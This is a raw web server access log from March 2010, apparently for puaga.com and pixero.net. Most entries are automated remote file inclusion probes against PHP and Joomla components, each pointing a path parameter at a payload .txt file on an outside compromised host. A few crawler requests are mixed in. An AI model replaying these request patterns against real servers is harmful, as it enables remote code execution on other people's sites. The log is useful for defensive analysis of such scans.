77.241.83.107 - - [04/Mar/2010:05:54:41 -0800] "GET /logs/access_100219.log//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:41 -0800] "GET /admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:41 -0800] "GET /logs//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:41 -0800] "GET /logs/access_100209.log//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [04/Mar/2010:05:55:00 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.puaga.com"
219.150.205.155 - - [04/Mar/2010:05:55:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.puaga.com"
219.150.205.156 - - [04/Mar/2010:05:55:03 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:05:55:57 -0800] "GET /logs/access_100226.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [04/Mar/2010:05:55:59 -0800] "GET /logs/access_100126.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:05:57:09 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:05:57:09 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:05:57:11 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:05:57:12 -0800] "GET /logs/access_100131.log/%030index.php?option=com_ponygallery&func=detail&id=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:05:57:12 -0800] "GET /%030index.php?option=com_ponygallery&func=detail&id=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:05:57:12 -0800] "GET /logs/%030index.php?option=com_ponygallery&func=detail&id=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [04/Mar/2010:05:57:29 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [04/Mar/2010:05:57:29 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [04/Mar/2010:05:57:29 -0800] "GET /logs/access_100225.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:05:57:56 -0800] "GET /logs/access_100225.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:05:57:57 -0800] "GET /logs/access_100225.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:05:57:57 -0800] "GET /%030index.php?option=com_newsfeeds&task=view&feedid=http://bidakara.ac.id/ikhwan/foto_berita/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:05:57:58 -0800] "GET /logs/%030index.php?option=com_newsfeeds&task=view&feedid=http://bidakara.ac.id/ikhwan/foto_berita/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:05:57:58 -0800] "GET /logs/access_100212.log/%030index.php?option=com_newsfeeds&task=view&feedid=http://bidakara.ac.id/ikhwan/foto_berita/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:00:06 -0800] "GET /components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:00:06 -0800] "GET /components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:00:06 -0800] "GET /logs/access_100210.log%20%20//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:00:11 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:00:11 -0800] "GET /logs/access_100210.log%20%20//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:00:11 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:00:57 -0800] "GET /logs/access_100204.log%20%20//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:01:16 -0800] "GET /logs/access_100204.log%20%20//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:06:01:47 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
184.73.34.143 - - [04/Mar/2010:06:02:43 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "taptubot *** please read http://www.taptu.com/corp/taptubot ***" "pixero.net"
184.73.34.143 - - [04/Mar/2010:06:02:49 -0800] "GET / HTTP/1.0" 200 2016 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "pixero.net"
184.73.34.143 - - [04/Mar/2010:06:02:50 -0800] "GET /pnetsite/standard.css HTTP/1.0" 200 488 "http://pixero.net/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "pixero.net"
184.73.34.143 - - [04/Mar/2010:06:02:50 -0800] "GET /apple-touch-icon.png HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "pixero.net"
184.73.34.143 - - [04/Mar/2010:06:02:55 -0800] "GET / HTTP/1.0" 200 2016 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.pixero.net"
184.73.34.143 - - [04/Mar/2010:06:02:56 -0800] "GET /pnetsite/standard.css HTTP/1.0" 200 488 "http://www.pixero.net/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.pixero.net"
184.73.34.143 - - [04/Mar/2010:06:03:03 -0800] "GET /iphone/ HTTP/1.0" 200 1805 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.pixero.net"
184.73.34.143 - - [04/Mar/2010:06:03:24 -0800] "GET /mobile/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.pixero.net"
184.73.34.143 - - [04/Mar/2010:06:03:25 -0800] "GET /m/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.pixero.net"
184.73.34.143 - - [04/Mar/2010:06:03:25 -0800] "GET /mobi/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.pixero.net"
184.73.34.143 - - [04/Mar/2010:06:03:25 -0800] "GET / HTTP/1.0" 200 2016 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6; taptu-downloader) Gecko/20070725 Firefox/2.0.0.6" "pixero.net"
71.6.165.149 - - [04/Mar/2010:06:03:33 -0800] "GET /logs/access_100129.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:06:04:04 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:06:04:07 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:04:39 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:04:39 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:04:39 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:04:55 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:06:05:00 -0800] "GET /logs/access_100226.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:05:01 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:05:01 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:05:01 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:05:09 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:05:19 -0800] "GET /logs//include/write.php?dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:05:20 -0800] "GET /logs/access_100205.log%20%20//include/write.php?dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:05:20 -0800] "GET /include/write.php?dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:05:20 -0800] "GET /logs/access_100207.log%20%20//include/write.php?dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:22 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:22 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:22 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:25 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:25 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:25 -0800] "GET /logs/access_100224.log//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:30 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:30 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:30 -0800] "GET /logs/access_100224.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:31 -0800] "GET /logs/access_100224.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:31 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:06:31 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:06:33 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:06:33 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:07:08 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:07:08 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:07:08 -0800] "GET /logs/access_100209.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:07:09 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:07:09 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:07:14 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:07:14 -0800] "GET /logs/access_100209.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:07:19 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:07:20 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:06:07:24 -0800] "GET /logs/access_100203.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [04/Mar/2010:06:07:30 -0800] "GET /view.php?view[use_category]=1&dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [04/Mar/2010:06:07:31 -0800] "GET /logs/access_100129.log//view.php?view[use_category]=1&dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [04/Mar/2010:06:07:31 -0800] "GET /logs/access_100202.log//view.php?view[use_category]=1&dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [04/Mar/2010:06:07:31 -0800] "GET /logs//view.php?view[use_category]=1&dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [04/Mar/2010:06:07:53 -0800] "GET /logs/access_100129.log//view.php?view[use_category]=1&dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [04/Mar/2010:06:07:53 -0800] "GET /logs//view.php?view[use_category]=1&dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [04/Mar/2010:06:07:53 -0800] "GET /logs/access_100202.log//view.php?view[use_category]=1&dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [04/Mar/2010:06:07:53 -0800] "GET /view.php?view[use_category]=1&dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:06:09:45 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:06:09:45 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:06:09:45 -0800] "GET /logs/access_100210.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:06:10:42 -0800] "GET /logs/access_100226.log//bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:06:10:42 -0800] "GET /logs//bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:06:10:42 -0800] "GET /bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [04/Mar/2010:06:11:36 -0800] "GET / HTTP/1.1" 200 3642 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "puaga.com"
112.76.72.3 - - [04/Mar/2010:06:11:49 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:06:11:49 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:06:11:49 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.126.35.98 - - [04/Mar/2010:06:12:03 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:06:12:34 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:06:14:08 -0800] "GET /logs/access_100202.log//bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:14:26 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:14:29 -0800] "GET /logs/access_100129.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:14:43 -0800] "GET /logs/access_100129.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:06:14:44 -0800] "GET /logs/access_100205.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:15:03 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
